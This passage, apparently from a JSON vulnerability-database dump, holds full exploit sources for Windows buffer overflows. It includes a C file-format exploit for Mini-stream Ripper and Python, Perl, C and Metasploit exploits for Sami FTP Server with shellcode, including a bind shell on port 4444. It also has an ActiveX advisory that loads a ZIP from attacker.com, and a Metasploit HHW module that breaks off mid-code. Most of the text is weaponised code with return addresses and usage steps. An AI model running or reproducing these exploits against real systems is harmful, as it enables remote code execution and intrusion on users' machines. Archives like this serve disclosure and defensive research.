x43\\x35\\x4f\\x4f\"\r\n\"\\x42\\x4d\\x48\\x56\\x4a\\x56\\x41\\x41\\x4e\\x35\\x48\\x36\\x43\\x35\\x49\\x38\"\r\n\"\\x41\\x4e\\x45\\x49\\x4a\\x46\\x46\\x4a\\x4c\\x51\\x42\\x57\\x47\\x4c\\x47\\x55\"\r\n\"\\x4f\\x4f\\x48\\x4d\\x4c\\x36\\x42\\x31\\x41\\x45\\x45\\x35\\x4f\\x4f\\x42\\x4d\"\r\n\"\\x4a\\x36\\x46\\x4a\\x4d\\x4a\\x50\\x42\\x49\\x4e\\x47\\x55\\x4f\\x4f\\x48\\x4d\"\r\n\"\\x43\\x35\\x45\\x35\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x45\\x4e\\x49\\x44\\x48\\x38\"\r\n\"\\x49\\x54\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x42\\x55\\x46\\x35\\x46\\x45\\x45\\x35\"\r\n\"\\x4f\\x4f\\x42\\x4d\\x43\\x49\\x4a\\x56\\x47\\x4e\\x49\\x37\\x48\\x4c\\x49\\x37\"\r\n\"\\x47\\x45\\x4f\\x4f\\x48\\x4d\\x45\\x55\\x4f\\x4f\\x42\\x4d\\x48\\x36\\x4c\\x56\"\r\n\"\\x46\\x46\\x48\\x36\\x4a\\x46\\x43\\x56\\x4d\\x56\\x49\\x38\\x45\\x4e\\x4c\\x56\"\r\n\"\\x42\\x55\\x49\\x55\\x49\\x52\\x4e\\x4c\\x49\\x48\\x47\\x4e\\x4c\\x36\\x46\\x54\"\r\n\"\\x49\\x58\\x44\\x4e\\x41\\x43\\x42\\x4c\\x43\\x4f\\x4c\\x4a\\x50\\x4f\\x44\\x54\"\r\n\"\\x4d\\x32\\x50\\x4f\\x44\\x54\\x4e\\x52\\x43\\x49\\x4d\\x58\\x4c\\x47\\x4a\\x53\"\r\n\"\\x4b\\x4a\\x4b\\x4a\\x4b\\x4a\\x4a\\x46\\x44\\x57\\x50\\x4f\\x43\\x4b\\x48\\x51\"\r\n\"\\x4f\\x4f\\x45\\x57\\x46\\x54\\x4f\\x4f\\x48\\x4d\\x4b\\x45\\x47\\x35\\x44\\x35\"\r\n\"\\x41\\x35\\x41\\x55\\x41\\x35\\x4c\\x46\\x41\\x50\\x41\\x35\\x41\\x45\\x45\\x35\"\r\n\"\\x41\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x4d\\x4a\\x49\\x4d\\x45\\x30\\x50\\x4c\"\r\n\"\\x43\\x35\\x4f\\x4f\\x48\\x4d\\x4c\\x56\\x4f\\x4f\\x4f\\x4f\\x47\\x33\\x4f\\x4f\"\r\n\"\\x42\\x4d\\x4b\\x58\\x47\\x45\\x4e\\x4f\\x43\\x38\\x46\\x4c\\x46\\x36\\x4f\\x4f\"\r\n\"\\x48\\x4d\\x44\\x55\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x4f\\x4e\\x50\\x4c\\x42\\x4e\"\r\n\"\\x42\\x36\\x43\\x55\\x4f\\x4f\\x48\\x4d\\x4f\\x4f\\x42\\x4d\\x5a\";\r\n \r\nint main ( int argc , char * argv[])\r\n{\r\n FILE* expfle= NULL;\r\n char* EIP = \"\\x53\\x93\\x42\\x7e\"; // jmp esp -> user32.dll\r\n int i;\r\n \r\n printf(\"\\t. .. ... Mini-stream Ripper (.pls) Stack buffer Overflow Exploit ... .. .\\r\\n\");\r\n printf(\"\\t -------> now upload the .pls file to a remote server <-------\\n\");\r\n \r\n \r\n if( (expfle=fopen(\"mini-stream-ripper.pls\",\"wb\")) ==NULL )\r\n {\r\n perror(\"Cannot create the exploit file!!! :(\");\r\n exit(0);\r\n }\r\n \r\n for (i=0; i<17405; i++)\r\n {\r\n fwrite(\"\\x41\", 1, 1, expfle); // Junk\r\n }\r\n \r\n fwrite(EIP, 4, 1, expfle); // ret\r\n \r\n for (i=0; i<10; i++)\r\n {\r\n fwrite(\"\\x90\", 1, 1, expfle); // Nop's\r\n }\r\n \r\n fwrite(shell, sizeof(shell), 1, expfle); // write the shell\r\n \r\n for (i=0; i<16702; i++)\r\n {\r\n fwrite(\"\\xcc\", 1, 1, expfle); // finish off buffer\r\n }\r\n \r\n fclose(expfle);\r\n \r\n printf(\"[+] mini-stream-ripper.pls Created successfully! \\r\\n\");\r\n printf(\"[+] Exploited by mr_me \\r\\n\");\r\n \r\n return 0;\r\n \r\n}\r\n\r\n\r\n\r\n\n# 0day.today [2018-02-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8215"}, {"lastseen": "2018-01-09T13:11:30", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category remote exploits", "modified": "2008-04-07T00:00:00", "published": "2008-04-07T00:00:00", "id": "1337DAY-ID-9179", "href": "https://0day.today/exploit/description/9179", "type": "zdt", "title": "CDNetworks Nefficient Download (NeffyLauncher.dll) Code Execution Vuln", "sourceData": "======================================================================\r\nCDNetworks Nefficient Download (NeffyLauncher.dll) Code Execution Vuln\r\n======================================================================\r\n\r\nTitle: CDNetworks Nefficient Download(NeffyLauncher.dll) Vulnerabilities\r\nAuthor: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com)\r\nSeverity: High\r\nImpact: Remote Code Execution\r\nVulnerable Systems: MS Windows Systems\r\nVersion: NeffyLauncher 1.0.5 {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C}\r\nSolution: Upgrade the vendor's patch\r\nVendor's Homepage: http://www.cdnetworks.com\r\nReference: How to stop an ActiveX control from running in Internet Explorer\r\n http://support.microsoft.com/kb/240797/ko\r\n http://support.microsoft.com/kb/240797/en-us\r\nHistory:\r\n - 02.27.2008: Initiate notify\r\n - 03.06.2008: The vendor patched\r\n - After: The vendor are applying the patch to their customers.\r\n\r\nDescription:\r\nNeffycient Download is a ActiveX control used to download and to upgrade\r\nsuch as game install files through HTTP, FTP, etc. It has two\r\nvulnerabilities.\r\n1st, a attacker can copy a malicious file to any path such as start program\r\nfolder(C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup).\r\n2nd, a attacker can issue keycodes which are used to restrict execution on\r\nother domains.\r\n\r\nObject:\r\nI notify this vulnerability not to promote abnormal uses but to make\r\na software more secure. This vulnerability was patched by the vendor's\r\npositive effort. I hope this information helps many people who try\r\nto study security and to develop an application.\r\n\r\n1. Remote Code Execution\r\nFirst of all, we must have write permission on a board in a web site used\r\nthis ActiveX or obtain a valid keycode which is correct to your site.\r\nAn Attacker who has a valid keycode can make a expolit by modifying\r\nHttpSkin,\r\nSkinPath's values. Malicious files which is on attacker's site must\r\nbe compressed as ZIP file.\r\nFor instance. The below modification copies abnormal files to Windows's\r\nroot directory.\r\n<PARAM NAME=\"HttpSkin\" VALUE=\"http://www.attacker.com/maliciousFiles.zip\">\r\n<PARAM NAME=\"SkinPath\" VALUE=\"../../../../\">\r\n\r\nIn this way an attacker can modify SkinPath's value to All Users's Start\r\nProgram Folder. Then he can execute his malicious program when the user\r\nrestarts his computer.\r\n\r\n2. Generating a KeyCode Value\r\nAn attacker can make the keycode generator by debugging this ActiveX\r\ncontrol. A keycode's value has two meaning. First two digits represent\r\nthe domain's length(hexadecimal).\r\nNext five(or more) digits are valuable numbers to calculate a domain.\r\nThe keycode check the procedure of this ActiveX control likes below.\r\nIt calculates the keycode's value and returns four bytes as a result.\r\nNext it starts the domain's calculation and returns four bytes.\r\nFinally, it compares with these four bytes to check whether the site is\r\nvalid.\r\nI made a PoC using inline assembly and C. But it doesn't open to the public\r\nbecause of the vendor's request. (Just refer above descriptions.)\r\n\r\n\r\n\n# 0day.today [2018-01-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/9179"}], "cve": [{"lastseen": "2019-12-07T12:53:45", "bulletinFamily": "NVD", "description": "Integard Pro 2.2.0.9026 allows remote attackers to execute arbitrary code via a buffer overflow involving a long NoJs parameter to the /LoginAdmin URI.", "modified": "2019-12-06T18:15:00", "id": "CVE-2019-16702", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-16702", "published": "2019-09-23T03:15:00", "title": "CVE-2019-16702", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-11-01T17:29:56", "bulletinFamily": "exploit", "description": "KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH). CVE-2006-0441. Remote exploit for Windows platform", "modified": "2016-11-01T00:00:00", "published": "2016-11-01T00:00:00", "id": "EDB-ID:40675", "href": "https://www.exploit-db.com/exploits/40675/", "type": "exploitdb", "title": "KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)", "sourceData": "#/usr/bin/python\r\n#-*- Coding: utf-8 -*-\r\n\r\n### Sami FTP Server 2.0.2- SEH Overwrite, Buffer Overflow by n30m1nd ### \r\n\r\n# Date: 2016-01-11\r\n# Exploit Author: n30m1nd\r\n# Vendor Homepage: http://www.karjasoft.com/\r\n# Software Link: http://www.karjasoft.com/files/samiftp/samiftpd_install.exe\r\n# Version: 2.0.2\r\n# Tested on: Win7 64bit and Win10 64 bit\r\n\r\n# Credits\r\n# =======\r\n# Thanks to PHRACK for maintaining all the articles up for so much time... \r\n# These are priceless and still current for exploit development!!\r\n# Shouts to the crew at Offensive Security for their huge efforts on making\tthe infosec community better\r\n\r\n# How to\r\n# ======\r\n# * Open Sami FTP Server and open its graphical interface\r\n# * Run this python script and write the IP to attack\r\n# * Connect to the same IP on port 4444\r\n#\r\n# BONUS\r\n# =====\r\n# Since the program will write the data into its (SamiFTP.binlog) logs it will try to load these logs on each\r\n# start and so, it will crash and run our shellcode everytime it starts.\r\n\r\n# Why?\r\n# ====\r\n# The graphical interface tries to show the user name which produces an overflow overwriting SEH\r\n\r\n# Exploit code\r\n# ============\r\n\r\nimport socket\r\nimport struct\r\n\r\ndef doHavoc(ipaddr):\r\n # Bad chars: 00 0d 0a ff\r\n alignment = \"\\x90\"*3\r\n \r\n jmpfront = \"345A7504\".decode('hex')\r\n #CPU Disasm\r\n #Hex dump Command \r\n # 34 5A XOR AL,5A\r\n # 75 04 JNE SHORT +04\r\n \r\n # pop pop ret in tmp01.dll\r\n popret = 0x10022ADE\r\n \r\n # fstenv trick to get eip: phrack number 62\r\n # and store it into EAX for the metasploit shell (BufferRegister)\r\n getEIPinEAX = \"D9EED934E48B44E40C040b\".decode('hex')\r\n #CPU Disasm\r\n #Hex dump Command\r\n # D9EE FLDZ\r\n # D934E4 FSTENV SS:[ESP]\r\n # 8B44E4 0C MOV EAX,DWORD PTR SS:[ESP+0C]\r\n # 04 0B ADD AL,0B\r\n\r\n # Bind shellcode on port 4444 - alpha mixed BufferRegister=EAX\r\n shellcode = (\r\n getEIPinEAX + \r\n \"PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylm8mRS0UP7p\"\r\n \"e0K9jEDqYPU4Nk60VPlKCbdLnkbrWdLKqb4hfoNWczEvdqyoNLElpaalC2dl10kq\"\r\n \"xO6mEQ9WxbjRf22wNkf220lKsz5lNkblr1sHxcsxGqZqcaLK0YQ05QiCNkCyB8Hc\"\r\n \"VZ1Ynk5dlKEQyF01IoNLYQHOvm31yW6X9pRUXvwsSMIhgKqmDdT5KTf8NkaHWTEQ\"\r\n \"yCavNkDLBklKbx7lgqN3nkC4nkuQXPk9w47Tq4skaKsQV9pZPQkOYpcosobzNkWb\"\r\n \"8kNmSmbH5cP2C0Wpu8Qgd3UbCof4e80LD7ev379oyElxlP31GpWpFIo4V4bpCXa9\"\r\n \"op2KePyohURJFhPY0P8bimw0pPG0rpu8xjDOYOipYoiEj7QxWrC0wa3lmYZFbJDP\"\r\n \"qFqGCXYRIKDw3WkOZuv7CXNWkYehKOkOiEaGPhD4HlwKm1KOhUQGJ7BHRUpnrmqq\"\r\n \"Iokee83S2McT30oyXcQGV767FQIfcZfrv9PVYrImQvKwG4DdelvaGqLM0D5tDPO6\"\r\n \"GpRd0T602vaFF6w666rnqFsf2sPV0h2YzleoovYoXUK9kPrnSfPFYo00Ph7xk7wm\"\r\n \"sPYoKeMkxplulb2vsXoVmEOMomKO9EgL4FCLFjk0YkM0qec5Mkg7FsD2ROqzGpv3\"\r\n \"ioJuAA\"\r\n )\r\n \r\n # Final payload, SEH overwrite ocurrs at 600 bytes\r\n payload = alignment + \".\"*(600-len(alignment)-len(jmpfront)) + jmpfront + struct.pack(\"<L\", popret) + shellcode\r\n try:\r\n s = socket.create_connection((ipaddr, 21))\r\n s.send(\"USER \"+ payload +\"\\r\\n\" )\r\n print s.recv(4096)\r\n \r\n s.send(\"PASS \"+ payload +\"\\r\\n\" )\r\n print s.recv(4096)\r\n print s.recv(4096)\r\n except e:\r\n print str(e)\r\n exit(\"[+] Couldn't connect\")\r\n \r\nif __name__ == \"__main__\":\r\n ipaddr = raw_input(\"[+] IP: \")\r\n doHavoc(ipaddr)\r\n while raw_input(\"[?] Got shell?(y/n) \").lower() == \"n\":\r\n doHavoc(ipaddr)\r\n print \"[+] Enjoy...\"", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/40675/"}, {"lastseen": "2016-02-02T06:18:19", "bulletinFamily": "exploit", "description": "KarjaSoft Sami FTP Server v2.02 USER Overflow. CVE-2006-0441,CVE-2006-2212. Remote exploit for windows platform", "modified": "2010-04-30T00:00:00", "published": "2010-04-30T00:00:00", "id": "EDB-ID:16702", "href": "https://www.exploit-db.com/exploits/16702/", "type": "exploitdb", "title": "KarjaSoft Sami FTP Server 2.02 - USER Overflow", "sourceData": "##\r\n# $Id: sami_ftpd_user.rb 9179 2010-04-30 08:40:19Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'KarjaSoft Sami FTP Server v2.02 USER Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\t\tThis module exploits the KarjaSoft Sami FTP Server version 2.02\r\n\t\t\t\tby sending an excessively long USER string. The stack is overwritten\r\n\t\t\t\twhen the administrator attempts to view the FTP logs. Therefore, this exploit\r\n\t\t\t\tis passive and requires end-user interaction. Keep this in mind when selecting\r\n\t\t\t\tpayloads. When the server is restarted, it will re-execute the exploit until\r\n\t\t\t\tthe logfile is manually deleted via the file system.\r\n\t\t\t},\r\n\t\t\t'Author'\t=> [ 'patrick' ],\r\n\t\t\t'Arch'\t\t=> [ ARCH_X86 ],\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Version'\t=> '$Revision: 9179 $',\r\n\t\t\t'Stance'\t=> Msf::Exploit::Stance::Passive,\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t# This exploit appears to have been reported multiple times.\r\n\t\t\t\t\t[ 'CVE', '2006-0441'],\r\n\t\t\t\t\t[ 'CVE', '2006-2212'],\r\n\t\t\t\t\t[ 'OSVDB', '25670'],\r\n\t\t\t\t\t[ 'BID', '16370'],\r\n\t\t\t\t\t[ 'BID', '22045'],\r\n\t\t\t\t\t[ 'BID', '17835'],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/1448'],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/1452'],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/1462'],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/3127'],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/3140'],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'seh',\r\n\t\t\t\t},\r\n\t\t\t'Platform' \t=> ['win'],\r\n\t\t\t'Privileged'\t=> false,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space'\t\t\t=> 300,\r\n\t\t\t\t\t'BadChars'\t\t=> \"\\x00\\x0a\\x0d\\x20\\xff\",\r\n\t\t\t\t\t'StackAdjustment'\t=> -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets' \t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll\r\n\t\t\t\t\t[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd11a9 } ], # p/p/r ws2help.dll\r\n\t\t\t\t\t[ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa12bc } ], # p/p/r ws2help.dll\r\n\t\t\t\t\t[ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa32ad } ], # p/p/r ws2help.dll\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jan 24 2006'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(21),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tconnect\r\n\t\tbanner = sock.get(-1,3)\r\n\t\tdisconnect\r\n\r\n\t\tif (banner =~ /Sami FTP Server 2.0.2/)\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tsploit = Rex::Text.rand_text_alphanumeric(596) + generate_seh_payload(target.ret)\r\n\r\n\t\tlogin = \"USER #{sploit}\\r\\n\"\r\n\t\tlogin << \"PASS \" + Rex::Text.rand_char(payload_badchars)\r\n\r\n\t\tsock.put(login + \"\\r\\n\")\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16702/"}, {"lastseen": "2016-01-31T17:49:32", "bulletinFamily": "exploit", "description": "Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow Exploit. CVE-2006-0441. Remote exploit for windows platform", "modified": "2007-01-17T00:00:00", "published": "2007-01-17T00:00:00", "id": "EDB-ID:3140", "href": "https://www.exploit-db.com/exploits/3140/", "type": "exploitdb", "title": "Sami FTP Server 2.0.2 USER/PASS Remote Buffer Overflow Exploit", "sourceData": "#!/usr/bin/perl\r\n#\t\tExploit for SAMI FTP version 2.0.2\r\n#\t\tUSER/PASS BUFFER OVERFLOW ARBITARY REMOTE CODE EXECUTION (CALC.exe) \r\n#\t\tYou can put you own shellcode to spawn a shell\r\n#\t\tThrusday 17th Jan 2007\r\n#\t\tTested on : Windows 2000 SP4 (Use your own return address for other flavors)\t\t\r\n#\t\t\r\n#\t\t\t\t\r\n#\t\t\r\n#\t\tCoded by UmZ! umz32.dll@gmail.com\r\n#\t\tOn behalf of : Secure Bytes Inc.\r\n#\t\thttp://www.secure-bytes.com/exploits/\r\n#\t\r\n#\r\n#\t\r\n#\t Special Thanks to Ahmad Tauqeer, Ali Shuja and Uquali\r\n#\r\n#\r\n#\t Disclaimer: This Proof of concept exploit is for educational purpose only.\r\n#\t\t Please do not use it against any system without prior permission.\r\n# \t\tYou are responsible for yourself for what you do with this code.\r\n#\r\n#\r\n#\t Note:\tAfter executing the exploit You will get \"Cannot login User or password not correct.\"\r\n#\t\t\tThat doesn't mean exploit failed whenever you click on Sami FTP server it will crash \r\n#\t\t\tresulting in the execution of calc.exe and will execute whenever the SAMI FTP server \r\n#\t\t\trestarts until it is reinstalled.\r\n\r\n\r\nuse Net::FTP;\r\n\r\n\r\nprint \"Coded by UmZ! umz32.dll@gmail.com\\n\";\r\nprint \"http://www.secure-bytes.com/exploits/\\n\";\r\n\t\r\n$ftp = Net::FTP->new(\"192.168.100.250\", Debug => 0) or die \"Cannot connect : $@\";\r\n\r\nmy $msg =\"\\x90\" x596; #140\r\nmy $msg2 =\"B\"x484;\r\nmy $shellcode = \"\\x31\\xc9\\x83\\xe9\\xdb\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xd8\".\r\n\t\t \"\\x22\\x72\\xe4\\x83\\xeb\\xfc\\xe2\\xf4\\x24\\xca\\x34\\xe4\\xd8\\x22\\xf9\\xa1\".\r\n\t\t \"\\xe4\\xa9\\x0e\\xe1\\xa0\\x23\\x9d\\x6f\\x97\\x3a\\xf9\\xbb\\xf8\\x23\\x99\\x07\".\r\n\t\t \"\\xf6\\x6b\\xf9\\xd0\\x53\\x23\\x9c\\xd5\\x18\\xbb\\xde\\x60\\x18\\x56\\x75\\x25\".\r\n\t\t \"\\x12\\x2f\\x73\\x26\\x33\\xd6\\x49\\xb0\\xfc\\x26\\x07\\x07\\x53\\x7d\\x56\\xe5\".\r\n\t\t \"\\x33\\x44\\xf9\\xe8\\x93\\xa9\\x2d\\xf8\\xd9\\xc9\\xf9\\xf8\\x53\\x23\\x99\\x6d\".\r\n\t\t \"\\x84\\x06\\x76\\x27\\xe9\\xe2\\x16\\x6f\\x98\\x12\\xf7\\x24\\xa0\\x2d\\xf9\\xa4\".\r\n\t\t \"\\xd4\\xa9\\x02\\xf8\\x75\\xa9\\x1a\\xec\\x31\\x29\\x72\\xe4\\xd8\\xa9\\x32\\xd0\".\r\n\t\t \"\\xdd\\x5e\\x72\\xe4\\xd8\\xa9\\x1a\\xd8\\x87\\x13\\x84\\x84\\x8e\\xc9\\x7f\\x8c\".\r\n\t\t \"\\x28\\xa8\\x76\\xbb\\xb0\\xba\\x8c\\x6e\\xd6\\x75\\x8d\\x03\\x30\\xcc\\x8d\\x1b\".\r\n\t\t \"\\x27\\x41\\x13\\x88\\xbb\\x0c\\x17\\x9c\\xbd\\x22\\x72\\xe4\";\r\n\r\nmy $test= \"\\x90\" x 108;\r\n\r\nmy $msg1=$msg. \"\\x70\\xFD\\x8B\\x01\".\"\\x96\\x64\\xF8\\x77\". $test . $shellcode. \"\\r\\n\";\r\n\r\n$ftp->login($msg1.\"\\r\\n\\0\",\"umz\") or die \"Cannot login \", $ftp->message;\r\n\r\n$ftp->quit;\r\n\r\n# milw0rm.com [2007-01-17]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3140/"}, {"lastseen": "2016-01-31T17:48:00", "bulletinFamily": "exploit", "description": "Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow PoC. CVE-2006-0441. Dos exploit for windows platform", "modified": "2007-01-14T00:00:00", "published": "2007-01-14T00:00:00", "id": "EDB-ID:3127", "href": "https://www.exploit-db.com/exploits/3127/", "type": "exploitdb", "title": "Sami FTP Server 2.0.2 USER/PASS Remote Buffer Overflow PoC", "sourceData": "/************************************************************************\r\n*KarjaSoft Sami FTP Server 2.0.2 USER/PASS buffer overflow *\r\n* *\r\n*Sending a long USER / PASS request to server triggers the vulnerability*\r\n*EAX and EDX are owned leading to code execution *\r\n*This is only a POC *\r\n*Thanks to rewterz and Muhammad Ahmed Siddiqui for discovery *\r\n* *\r\n*Usage: sami.exe ip port *\r\n* *\r\n*Coded by Marsu <Marsupilamipowa@hotmail.fr> *\r\n************************************************************************/\r\n\r\n#include \"winsock2.h\"\r\n#include \"stdio.h\"\r\n#include \"stdlib.h\"\r\n#pragma comment(lib, \"ws2_32.lib\")\r\n\r\nint main(int argc, char* argv[])\r\n{\r\n\tstruct hostent *he;\r\n\tstruct sockaddr_in sock_addr;\r\n\tWSADATA wsa;\r\n\tint ftpsock;\r\n\tchar recvbuff[1024];\r\n\tchar evilbuff[1024];\r\n\tint buflen=600;// 650 will kill the app. 600 just call the debugger\r\n\r\n\tif (argc!=3)\r\n\t{\r\n\t\tprintf(\"[+] Usage: %s <ip> <port>\\n\",argv[0]);\r\n\t\treturn 1;\r\n\t}\r\n\tWSACleanup();\r\n\tWSAStartup(MAKEWORD(2,0),&wsa);\r\n\r\n\tprintf(\"[+] Connecting to %s:%s ... \",argv[1],argv[2]);\r\n\tif ((he=gethostbyname(argv[1])) == NULL) {\r\n\t\tprintf(\"Failed\\n[-] Could not init gethostbyname\\n\");\r\n\t\treturn 1;\r\n\t}\r\n\tif ((ftpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {\r\n\t\tprintf(\"Failed\\n[-] Socket error\\n\");\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tsock_addr.sin_family = PF_INET;\r\n\tsock_addr.sin_port = htons(atoi(argv[2]));\r\n\tsock_addr.sin_addr = *((struct in_addr *)he->h_addr);\r\n\tmemset(&(sock_addr.sin_zero), '\\0', 8);\r\n\tif (connect(ftpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {\r\n\t\tprintf(\"Failed\\n[-] Sorry, cannot connect to %s:%s. Error: %i\\n\", argv[1],argv[2],WSAGetLastError());\r\n\t\treturn 1;\r\n\t}\r\n\tprintf(\"OK\\n\");\r\n\tmemset(recvbuff,'\\0',1024);\r\n\trecv(ftpsock, recvbuff, 1024, 0);\r\n\r\n\tprintf(\"[+] Building payload ... \");\r\n\tmemset(evilbuff,'A',buflen);\r\n\tmemset(evilbuff+585,'B',4);\t//eax and edx will be 42424262\r\n\tmemcpy(evilbuff,\"USER \",5);\r\n\tmemcpy(evilbuff+buflen,\"\\r\\n\\0\",3);\r\n\tprintf(\"OK\\n[+] Sending USER ... \");\r\n\tif (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {\r\n\t\tprintf(\"Failed\\n[-] Could not send\\n\");\r\n\t\treturn 1;\r\n\t}\r\n\tprintf(\"OK\\n\");\r\n\tmemset(recvbuff,'\\0',1024);\r\n\trecv(ftpsock, recvbuff, 1024, 0);\r\n\r\n\tmemcpy(evilbuff,\"PASS \",5);\r\n\tprintf(\"[+] Sending PASS ... \");\r\n\tif (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {\r\n\t\tprintf(\"Failed\\n[-] Could not send\\n\");\r\n\t\treturn 1;\r\n\t}\r\n\tprintf(\"OK\\n\");\r\n\trecv(ftpsock, recvbuff, 1024, 0);\r\n\r\n\tprintf(\"[+] Host should be down\\n\");\r\n\treturn 0;\r\n}\r\n\r\n// milw0rm.com [2007-01-14]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3127/"}], "metasploit": [{"lastseen": "2019-12-03T19:14:40", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in HTML Help Workshop 4.74 by creating a specially crafted hhp file.\n", "modified": "2017-07-24T13:26:21", "published": "2009-12-08T20:20:30", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/HHW_HHP_CONTENTFILE_BOF", "href": "", "type": "metasploit", "title": "HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Egghunter\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in HTML Help Workshop 4.74\n by creating a specially crafted hhp file.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'bratax', 'jduck' ],\n 'References' =>\n [\n [ 'CVE', '2006-0564' ],\n [ 'OSVDB', '22941' ],\n [ 'EDB', '1470' ],\n [ 'EDB', '1495' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'DisablePayloadHandler' => true,\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x1a\\x2f\\x5c\",\n 'StackAdjustment' => -4800,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP English SP3', { 'Offset' => 280, 'Ret' => 0x00401F93 } ], # CALL EDI hhw.exe v4.74.8702.0\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Feb 06 2006',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ false, 'The file name.', 'msf.hhp']),\n ])\n end\n\n def exploit\n\n # use the egghunter!\n eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })\n\n off = target['Offset']\n idxf = \"\"\n idxf << make_nops(off - eh_stub.length)\n idxf << eh_stub\n idxf << [target.ret].pack('V')\n\n sploit = \"[OPTIONS]\\r\\n\"\n sploit << \"Contents file=\"\n sploit << idxf\n sploit << \"\\r\\n\"\n sploit << \"\\r\\n\"\n sploit << \"[FILES]\\r\\n\"\n sploit << \"\\r\\n\"\n sploit << eh_egg\n\n hhp = sploit\n\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n\n 